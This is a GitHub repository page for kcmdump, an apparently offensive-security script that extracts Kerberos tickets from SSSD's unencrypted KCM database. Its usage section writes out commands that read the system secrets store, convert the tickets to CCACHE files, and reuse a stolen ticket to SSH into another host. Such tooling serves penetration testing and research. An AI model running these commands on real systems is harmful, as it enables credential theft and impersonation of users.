Skip to content

Dump Kerberos tickets from the KCM database of SSSD

Notifications You must be signed in to change notification settings

synacktiv/kcmdump

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

KCM dumper

Quick script to dump the KCM database used by SSSD and recover Kerberos tickets in the CCACHE format.

Initially based on SSSDKCMExtractor and KCMTicketFormatter.

Description

Since version 2.0.0 (2018-08-13), the back end storage of the KCM responder of SSSD does not encrypt the database content anymore. It however still relies on an LDB database (itself based on TDB), which makes it easily searchable using LDAP-like queries.

SSSD uses a custom storage format for Kerberos tickets, which can be converted to standard CCACHE files using this script.

Usage

$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local

About

Dump Kerberos tickets from the KCM database of SSSD

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages